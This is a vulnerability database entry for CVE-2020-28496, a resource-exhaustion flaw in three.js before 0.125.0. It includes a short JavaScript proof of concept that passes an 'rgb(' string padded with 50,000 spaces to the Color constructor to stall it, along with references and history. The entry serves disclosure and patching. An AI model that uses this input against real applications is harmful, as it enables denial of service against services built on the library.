CVE-2020-28496

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Configurations

Configuration 1 (hide)

cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:*

History

21 Nov 2024, 05:22

Type Values Removed Values Added
References () https://github.com/mrdoob/three.js/issues/21132 - Exploit, Issue Tracking, Third Party Advisory () https://github.com/mrdoob/three.js/issues/21132 - Exploit, Issue Tracking, Third Party Advisory
References () https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e - Patch, Third Party Advisory () https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e - Patch, Third Party Advisory
References () https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972 - Exploit, Third Party Advisory () https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972 - Exploit, Third Party Advisory
References () https://snyk.io/vuln/SNYK-JS-THREE-1064931 - Exploit, Third Party Advisory () https://snyk.io/vuln/SNYK-JS-THREE-1064931 - Exploit, Third Party Advisory

Information

Published : 2021-02-18 15:15

Updated : 2024-11-21 05:22


NVD link : CVE-2020-28496

Mitre link : CVE-2020-28496

CVE.ORG link : CVE-2020-28496


JSON object : View

Products Affected

three_project

  • three
CWE
CWE-400

Uncontrolled Resource Consumption